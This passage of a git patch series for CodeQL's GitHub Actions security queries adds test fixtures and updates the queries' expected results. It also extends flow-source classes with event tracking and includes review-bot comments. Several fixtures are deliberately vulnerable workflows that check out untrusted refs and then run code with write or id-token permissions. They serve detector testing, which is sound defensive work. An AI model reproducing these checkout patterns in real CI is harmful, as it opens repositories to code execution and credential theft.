output.successfully | taint | manual | +| juliangruber/read-file-action | * | artifact | output.content | taint | manual | +| jwalton/gh-ecr-push | * | input.image | output.imageUrl | taint | manual | +| 
kaisugi/action-regex-match | * | input.text | output.* | taint | manual | +| komorebitech/read-files-action | * | artifact | output.content | taint | manual | +| kubeshop/botkube/.github/workflows/process-chart.yml | * | input.next-version | output.new-version | taint | manual | +| kurt-code/gha-properties | * | artifact | output.* | taint | manual | +| larsoner/circleci-artifacts-redirector-action | * | input.artifact-path | output.url | taint | manual | +| linkerd/linkerd2 | * | input.component | output.image | taint | manual | +| linkerd/linkerd2 | * | input.docker-registry | output.image | taint | manual | +| linkerd/linkerd2 | * | input.tag | output.image | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.replace | output.value | taint | manual | +| mad9000/actions-find-and-replace-string | * | input.source | output.value | taint | manual | +| madhead/read-java-properties | * | artifact | output.* | taint | manual | +| mattdavis0351/actions | * | input.image-name | output.imageUrl | taint | manual | +| mattdavis0351/actions | * | input.tag | output.imageUrl | taint | manual | +| metro-digital/setup-tools-for-waas | * | input.gcp_sa_key | env.GCLOUD_PROJECT | taint | manual | +| mindsers/changelog-reader-action | * | artifact | output.* | taint | manual | +| miraai/read-helm-chart-yaml | * | artifact | output.* | taint | manual | +| mishakav/pytest-coverage-comment | * | input.multiple-files | output.summaryReport | taint | manual | +| mymindstorm/setup-emsdk | * | input.actions-cache-folder | env.EMSDK | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image | taint | manual | +| neondatabase/neon/.github/workflows/build-build-tools-image.yml | * | input.image-tag | output.image-tag | taint | manual | +| nichmor/minimal-read-yaml | * | artifact | output.* | taint | manual | +| novuhq/novu | * | input.docker_name | output.image | taint | manual | +| 
paulschuberth/regex-extract-action | * | input.haystack | output.matches | taint | manual | +| philosowaffle/peloton-to-garmin | * | input.os | output.artifact_name | taint | manual | +| pietrobolcato/action-read-yaml | * | artifact | output.* | taint | manual | +| release-kit/regex | * | input.string | output.* | taint | manual | +| rexdefuror/read-package-json | * | artifact | env.* | taint | manual | +| romanlamsal/dotenv-concat | * | artifact | output.* | taint | manual | +| ruby/setup-ruby | * | input.ruby-version | output.ruby-prefix | taint | manual | +| salsify/action-detect-and-tag-new-version | * | input.tag-template | output.tag | taint | manual | +| sammcj/dotenv-output-action | * | artifact | output.* | taint | manual | +| satya-500/read-file-github-action | * | artifact | output.contents | taint | manual | +| shallwefootball/upload-s3-action | * | input.destination_dir | output.object_key | taint | manual | +| shogo82148/actions-setup-perl | * | input.working-directory | env.PERL5LIB | taint | manual | +| simonblund/version-reader | * | artifact | output.version | taint | manual | +| streetsidesoftware/cspell | * | input.value | output.value | taint | manual | +| streetsidesoftware/cspell/.github/workflows/reuseable-load-integrations-repo-list.yml | * | input.ref | output.ref | taint | manual | +| suisei-cn/actions-download-file | * | input.filename | output.filename | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_head_sha | output.pull_request_head_sha | taint | manual | +| tencent/hippy/.github/workflows/reuse_approve_checks_run.yml | * | input.pull_request_number | output.pull_request_number | taint | manual | +| timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | manual | +| timheuer/base64-to-file | * | input.fileName | output.filePath | taint | manual | +| tmelliottjr/extract-regex-action | * | input.input | output.resultArray | taint | manual | +| 
tmelliottjr/extract-regex-action | * | input.input | output.resultString | taint | manual | +| traversals-analytics-and-intelligence/file-reader-action | * | artifact | output.content | taint | manual | +| zitadel/zitadel/.github/workflows/container.yml | * | input.build_image_name | output.build_image | taint | manual | +needs +| .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +testNormalizeExpr +| foo['bar'] == baz | foo.bar == baz | +| github.event.pull_request.user["login"] | github.event.pull_request.user.login | +| github.event.pull_request.user['login'] | github.event.pull_request.user.login | +| github.event.pull_request['user']['login'] | github.event.pull_request.user.login | +writeToGitHubEnv1 +| JSON_RESPONSE=$(ls \| grep -E "*.(tar.gz\|zip)$") | +isBashParameterExpansion +| parameter1 | | | +| parameter2 | | | +| parameter3 | ! | | +| parameter4 | # | | +| parameter5 | :- | value | +| parameter6 | : | =value | +| parameter7 | :+ | value | +| parameter8 | : | ?value | +| parameter9 | : | =default value | +| parameter10 | ## | */ | +| parameter11 | /# | pattern/string | +| parameter12 | /% | pattern/string | +| parameter13 | , | pattern | +| parameter14 | ,, | pattern | +| parameter15 | ^ | pattern | +| parameter16 | ^^ | pattern | +| parameter17 | : | start | +| parameter18 | # | pattern | +| parameter19 | ## | pattern | +| parameter20 | % | pattern | +| parameter21 | %% | pattern | +| parameter22 | / | pattern/string | +| parameter23 | // | pattern/string | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 03f9e5b18405..e4c1d9e443d0 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql 
@@ -21,8 +21,6 @@ query predicate extJobs(ExternalJob s) { any() } query predicate steps(Step s) { any() } -query predicate runSteps(Run run, string body) { run.getScript() = body } - query predicate runExprs(Run s, Expression e) { e = s.getAnScriptExpr() } query predicate uses(Uses s) { any() } @@ -59,8 +57,6 @@ query predicate summaries( actionsSummaryModel(action, version, input, output, kind, provenance) } -query predicate calls(DataFlow::CallNode call, string callee) { callee = call.getCallee() } - query predicate needs(DataFlow::Node e) { e.asExpr() instanceof NeedsExpression } query string testNormalizeExpr(string s) { 
@@ -86,57 +82,6 @@ query predicate writeToGitHubEnv1(string content) { ) } -query predicate writeToGitHubEnv(string key, string value, string content) { - exists(string t | - t = - [ - // block - "{\n echo 'VAR0<> \"$GITHUB_ENV\"\n", - "{\necho 'VAR1<> \"$GITHUB_ENV\"", - "{\necho 'VAR2<> \"$GITHUB_ENV\"", - "FOO\n{\n echo 'VAR22<> \"$GITHUB_ENV\"\nBAR", - // multiline - "FOO\necho \"VAR3<> $GITHUB_ENV\necho \"$TITLE\" >> $GITHUB_ENV\necho \"EOF\" >> $GITHUB_ENV\nBAR", - "echo \"PACKAGES_FILE_LIST<> \"${GITHUB_ENV}\"\nls | grep -E \"*.(tar.gz|zip)$\" >> \"${GITHUB_ENV}\"\nls | grep -E \"*.(txt|md)$\" >> \"${GITHUB_ENV}\"\necho \"EOF\" >> \"${GITHUB_ENV}\"", - // heredoc 1 - "cat >> $GITHUB_ENV << EOL\nVAR4=${ISSUE_BODY1}\nEOL", - "cat > $GITHUB_ENV << EOL\nVAR5<> $GITHUB_ENV\nVAR6=${ISSUE_BODY3}\nEOL\n", - "cat < $GITHUB_ENV\nVAR7<> \"$GITHUB_ENV\"\nVAR8=$(echo \"FOO\")\nVAR9<> $GITHUB_ENV", - "echo 'VAR14=$(> $GITHUB_ENV", - "echo VAR15=$(> $GITHUB_ENV", - "echo VAR16=$(cat issue.txt | sed 's/\\r/\\n/g' | grep -ioE '\\s*[a-z0-9_-]+/[a-z0-9_-]+\\s*$' | tr -d ' ') >> $GITHUB_ENV", - ] and - Bash::extractFileWrite(t, "GITHUB_ENV", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - -query predicate writeToGitHubOutput(string key, string value, string content) { - exists(string t | - t = - [ - "echo \"::set-output name=VAR1::$(> $GITHUB_OUTPUT", - "echo 'VAR5=$(> $GITHUB_OUTPUT", - "echo VAR6=$(> $GITHUB_OUTPUT", - "echo VAR7=$(> \"$GITHUB_OUTPUT\"", - "echo VAR8=$(> ${GITHUB_OUTPUT}", - "echo VAR9=$(> \"${GITHUB_OUTPUT}\"", - ] and - Bash::extractFileWrite(t, "GITHUB_OUTPUT", content) and - Bash::extractVariableAndValue(content, key, value) - ) -} - query predicate isBashParameterExpansion(string parameter, string operator, string params) { exists(string test | test = 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml new file mode 100644 index 000000000000..72db8c29370d --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/resolve-args.yml @@ -0,0 +1,36 @@ +on: + workflow_call: + inputs: + comment: + type: string + required: true + outputs: + SHOULD_RUN: + value: ${{ jobs.resolve.outputs.SHOULD_RUN }} + GIT_REF: + value: ${{ jobs.resolve.outputs.GIT_REF }} +jobs: + resolve: + runs-on: ubuntu-latest + outputs: + SHOULD_RUN: ${{ steps.resolve-step.outputs.SHOULD_RUN }} + GIT_REF: ${{ steps.resolve-step.outputs.GIT_REF }} + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + - if: github.event_name == 'workflow_run' + uses: ./.github/actions/download-artifact + - id: resolve-step + env: + ALLOWED_COMMENT: ${{ inputs.comment }} + run: | + if [[ "${{ github.event_name }}" == "workflow_run" ]]; then + if [[ "$(head -n 1 /tmp/artifacts/metadata.txt)" == *"$ALLOWED_COMMENT"* ]]; then + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=false >> "$GITHUB_OUTPUT" + fi + echo GIT_REF="$(tail -n 1 /tmp/artifacts/metadata.txt)" >> "$GITHUB_OUTPUT" + else + echo SHOULD_RUN=true >> "$GITHUB_OUTPUT" + echo GIT_REF="" >> "$GITHUB_OUTPUT" + fi diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml new file mode 100644 index 000000000000..32f45698a561 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test26.yml 
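Review bot: None of the three new fixtures (resolve-args.yml here, test26.yml and test27.yml in the next hunks) says which finding it is meant to produce, and the flow only makes sense when read across all three. In resolve-step, `/tmp/artifacts/metadata.txt` comes from the preceding `./.github/actions/download-artifact` step on a `workflow_run` trigger (the updated .expected links that action's run step to resolve-step), and its last line is written unmodified into `GIT_REF`; test26.yml forwards that output as `git_ref`, and test27.yml checks it out with `ref: ${{ inputs.git_ref }}` before running `./cmd` with `id-token: write`. Note also that the `ALLOWED_COMMENT` gate only decides `SHOULD_RUN`, and it does so by a substring match against the first line of the same artifact file, so it cannot be read as a control on the ref. A header comment on each file, e.g. `# CWE-829 fixture: GIT_REF is taken from a workflow_run artifact and reaches actions/checkout ref in test27.yml via test26.yml (expected: reported)`, would make the intended verdict reviewable without reconstructing the chain.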
@@ -0,0 +1,22 @@ +on: + schedule: + - cron: '7 18 * * *' + workflow_run: + workflows: [Trigger] + types: [completed] + workflow_dispatch: +jobs: + resolve: + if: (github.repository == 'test/test' && (github.event_name != 'workflow_run' || github.event.workflow_run.conclusion == 'success')) || github.event_name == 'workflow_dispatch' + uses: ./.github/workflows/resolve-args.yml + with: + comment: "foo" + scale: + permissions: + id-token: write + statuses: write + needs: [resolve] + if: needs.resolve.outputs.SHOULD_RUN == 'true' + uses: ./.github/workflows/test27.yml + with: + git_ref: ${{ needs.resolve.outputs.GIT_REF }} diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml new file mode 100644 index 000000000000..b1d776ef6c8a --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test27.yml @@ -0,0 +1,22 @@ +on: + workflow_dispatch: + inputs: + git_ref: + description: ref + type: string + workflow_call: + inputs: + git_ref: + type: string +jobs: + run: + permissions: + id-token: write + statuses: write + runs-on: ubuntu-latest + steps: + - uses: actions/checkout@9bb56186c3b09b4f86b1c65136769dd318469633 # v4.1.2 + with: + ref: ${{ inputs.git_ref }} + - run: | + ./cmd diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml new file mode 100644 index 000000000000..5f67fecc09a5 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test28.yml 
@@ -0,0 +1,20 @@ +on: + pull_request_target: + types: [opened, ready_for_review, synchronize, reopened, labeled, unlabeled] + branches: + - main + +permissions: + contents: read + +jobs: + setup-environment: + permissions: + contents: write + runs-on: ubuntu-latest + if: ${{ !contains(github.event.pull_request.labels.*.name, 'major-update') && (github.actor == 'renovate[bot]' || contains(github.event.pull_request.labels.*.name, 'renovatebot')) }} + steps: + - uses: actions/checkout@eef61447b9ff4aafe5dcd4e0bbf5d482be7e7871 # v4.2.1 + with: + ref: ${{ github.head_ref }} + - run: make foo diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index 3b2e5eb9de81..ec6a664a7abf 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
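Review bot: test28.yml does not record the verdict it expects, and of the new fixtures its outcome is the least obvious: the `pull_request_target` job checks out `github.head_ref` and runs `make foo` behind an `if` that admits `renovate[bot]` as actor or any PR carrying the `renovatebot` label. Whether that condition counts as a mitigation is exactly what the query has to decide — the label persists on the PR and `types` includes `synchronize`, so a later push to an already-labelled PR re-runs the job on the new head — and the visible .expected hunks only show resolve-args.yml edges, so this diff alone does not tell me what the test asserts. Add a header comment such as `# Expected: <reported|not reported> — actor/label gate on pull_request_target; label persists across synchronize` so the fixture documents its intent.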
@@ -7,6 +7,7 @@ edges | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | | .github/actions/download-artifact/action.yaml:25:7:29:4 | Run Step | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | | .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/artifactpoisoning91.yml:19:9:25:6 | Run Step: metadata | +| .github/actions/download-artifact/action.yaml:29:7:32:18 | Run Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:14:9:19:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:19:9:25:6 | Run Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/formal.yml:25:9:70:20 | Run Step | | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:23:9:26:6 | Uses Step | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable.yml:26:9:29:7 | Run Step | 
@@ -172,6 +173,9 @@ edges | .github/workflows/pr-workflow.yml:453:9:459:6 | Uses Step | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | | .github/workflows/pr-workflow.yml:459:9:462:6 | Run Step | .github/workflows/pr-workflow.yml:462:9:463:48 | Run Step: ok | | .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/resolve-args.yml:19:9:20:6 | Uses Step | .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/actions/download-artifact/action.yaml:6:7:25:4 | Uses Step | +| .github/workflows/resolve-args.yml:20:9:22:6 | Uses Step | .github/workflows/resolve-args.yml:22:9:36:13 | Run Step: resolve-step | | .github/workflows/reusable_local.yml:23:9:26:6 | Uses Step | .github/workflows/reusable_local.yml:26:9:29:7 | Run Step | | .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | | .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | 
@@ -279,6 +283,8 @@ edges | .github/workflows/test25.yml:17:9:22:6 | Uses Step | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | | .github/workflows/test25.yml:22:9:32:6 | Uses Step: downloadBuildScan | .github/workflows/test25.yml:32:9:35:6 | Run Step | | .github/workflows/test25.yml:32:9:35:6 | Run Step | .github/workflows/test25.yml:35:9:42:53 | Run Step | +| .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | +| .github/workflows/test28.yml:17:9:20:6 | Uses Step | .github/workflows/test28.yml:20:9:20:22 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | 
@@ -318,10 +324,8 @@ edges | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | .github/workflows/dependabot3.yml:15:9:20:6 | Uses Step | .github/workflows/dependabot3.yml:25:9:48:6 | Run Step: set-milestone | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/dependabot3.yml:3:5:3:23 | pull_request_target | .github/workflows/dependabot3.yml | | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/gitcheckout.yml:2:3:2:21 | pull_request_target | .github/workflows/gitcheckout.yml | | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | .github/workflows/label_trusted_checkout2.yml:12:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout2.yml:17:7:21:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/label_trusted_checkout2.yml:2:3:2:21 | pull_request_target | .github/workflows/label_trusted_checkout2.yml | -| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | 
.github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | -| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:3:3:3:8 | issues | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:5:3:5:15 | issue_comment | .github/workflows/level0.yml | | .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/level0.yml:7:3:7:21 | pull_request_target | .github/workflows/level0.yml | | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/poc2.yml:4:3:4:15 | issue_comment | .github/workflows/poc2.yml | 
@@ -338,10 +342,10 @@ edges | .github/workflows/test7.yml:33:9:36:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:33:9:36:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:36:9:39:6 | Run Step | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:36:9:39:6 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | .github/workflows/test7.yml:19:9:24:6 | Uses Step | .github/workflows/test7.yml:49:9:58:20 | Run Step: benchmark-pr | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test7.yml:4:3:4:15 | issue_comment | .github/workflows/test7.yml | -| .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:7:3:7:19 | workflow_dispatch | .github/workflows/test10.yml | | .github/workflows/test10.yml:25:9:30:2 | Run Step | .github/workflows/test10.yml:20:9:25:6 | Uses Step | .github/workflows/test10.yml:25:9:30:2 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test10.yml:8:3:8:21 | pull_request_target | .github/workflows/test10.yml | | .github/workflows/test11.yml:90:7:93:54 | Uses Step | .github/workflows/test11.yml:84:7:90:4 | Uses Step | .github/workflows/test11.yml:90:7:93:54 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test11.yml:5:3:5:15 | issue_comment | .github/workflows/test11.yml | | .github/workflows/test17.yml:19:15:23:58 | Uses Step | .github/workflows/test17.yml:12:15:19:12 | Uses 
Step | .github/workflows/test17.yml:19:15:23:58 | Uses Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test17.yml:3:5:3:16 | workflow_run | .github/workflows/test17.yml | +| .github/workflows/test27.yml:21:9:22:16 | Run Step | .github/workflows/test27.yml:18:9:21:6 | Uses Step | .github/workflows/test27.yml:21:9:22:16 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/test26.yml:4:3:4:14 | workflow_run | .github/workflows/test26.yml | | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | .github/actions/dangerous-git-checkout/action.yml:6:7:11:4 | Uses Step | .github/workflows/untrusted_checkout3.yml:13:9:13:23 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout3.yml:4:3:4:14 | workflow_run | .github/workflows/untrusted_checkout3.yml | | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:35:7:41:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | .github/workflows/untrusted_checkout4.yml:29:7:35:4 | Uses Step | .github/workflows/untrusted_checkout4.yml:41:7:47:4 | Run Step | Execution of untrusted code on a privileged workflow ($@) | .github/workflows/untrusted_checkout4.yml:2:3:2:15 | issue_comment | .github/workflows/untrusted_checkout4.yml | diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected index a476bdc22d8a..2b9bf3f2b79a 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutMedium.expected 
@@ -1,6 +1,9 @@ | .github/workflows/artifactpoisoning81.yml:11:9:14:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/dependabot2.yml:33:9:38:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc3.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/poc.yml:30:9:36:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test3.yml:28:9:33:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test4.yml:18:7:25:4 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | | .github/workflows/test8.yml:20:9:26:6 | Uses Step | Potential unsafe checkout of untrusted pull request on privileged workflow. | From fe9c9088809ee4857fe9ef36d99ce7e4becdc554 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 25 Oct 2024 14:18:20 +0200 Subject: [PATCH 634/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index a818ba5362aa..a8fab7861815 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.76 +version: 0.1.77 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index fe6bdb0d77e9..f5924ff430c4 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.76 +version: 0.1.77 groups: [actions, queries] suites: codeql-suites extractor: javascript From 6136a987643087be93aeaa1b29069f688b9a416a Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 28 Oct 2024 11:54:04 +0100 Subject: [PATCH 635/707] Add getEvent to RemoteFlowSource for events able to trigger the source --- .../codeql/actions/dataflow/FlowSources.qll | 46 ++++++++++++++++--- 1 file changed, 40 insertions(+), 6 deletions(-) diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 7dfdc42b05e2..fa964f475cf7 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll 
@@ -18,39 +18,47 @@ abstract class RemoteFlowSource extends SourceNode { /** Gets a string that describes the type of this remote flow source. */ abstract string getSourceType(); + /** Gets the event that triggered the source. */ + abstract Event getEvent(); + override string getThreatModel() { result = "remote" } } class GitHubCtxSource extends RemoteFlowSource { string flag; + Event event; GitHubCtxSource() { exists(Expression e, string context, string context_prefix | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and normalizeExpr(context) = "github.head_ref" and - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") and flag = "branch" ) } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } class GitHubEventCtxSource extends RemoteFlowSource { string flag; string context; + Event event; GitHubEventCtxSource() { exists(Expression e, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getATriggerEvent() and ( // the context is available for the job trigger events exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) or 
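Review bot: `GitHubCtxSource` binds `event = e.getEnclosingWorkflow().getATriggerEvent()` while `GitHubEventCtxSource` a few lines below binds `event = e.getATriggerEvent()`; the two differ whenever the enclosing job's trigger events are not the workflow's own (the test27.yml expectation elsewhere in this patch attributes a step inside a `workflow_call` workflow to the caller's `workflow_run` event, which suggests the node-level predicate follows callers while the workflow-level one would answer `workflow_call`). Because CodeInjectionCritical.ql in this same series now requires `source.getEvent() = event`, a `github.head_ref` source inside a reusable workflow could silently stop matching its caller's privileged event. Unless the workflow-level binding is deliberate, use `event = e.getATriggerEvent() and` in `GitHubCtxSource` here and in `GitHubEventJsonSource` (a later hunk of this file). The abstract doc comment would also be more accurate as `/** Gets an event that can trigger this source; a source may have several. */`, since `getEvent()` is a relation rather than a single value.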
@@ -65,12 +73,16 @@ class GitHubEventCtxSource extends RemoteFlowSource { override string getSourceType() { result = flag } string getContext() { result = context } + + override Event getEvent() { result = event } } abstract class CommandSource extends RemoteFlowSource { abstract string getCommand(); abstract Run getEnclosingRun(); + + override Event getEvent() { result = this.getEnclosingRun().getATriggerEvent() } } class GitCommandSource extends RemoteFlowSource, CommandSource { @@ -181,18 +193,19 @@ class GitHubEventPathSource extends RemoteFlowSource, CommandSource { class GitHubEventJsonSource extends RemoteFlowSource { string flag; + Event event; GitHubEventJsonSource() { exists(Expression e, string context, string regexp | this.asExpr() = e and context = e.getExpression() and + event = e.getEnclosingWorkflow().getATriggerEvent() and untrustedEventPropertiesDataModel(regexp, _) and ( // only contexts for the triggering events are considered tainted. // eg: for `pull_request`, we only consider `github.event.pull_request` exists(string context_prefix | - contextTriggerDataModel(e.getEnclosingWorkflow().getATriggerEvent().getName(), - context_prefix) and + contextTriggerDataModel(event.getName(), context_prefix) and normalizeExpr(context).matches("%" + context_prefix + "%") ) and normalizeExpr(context).regexpMatch("(?i).*" + wrapJsonRegexp(regexp) + ".*") @@ -206,6 +219,8 @@ class GitHubEventJsonSource extends RemoteFlowSource { } override string getSourceType() { result = flag } + + override Event getEvent() { result = event } } /** @@ -217,6 +232,8 @@ class 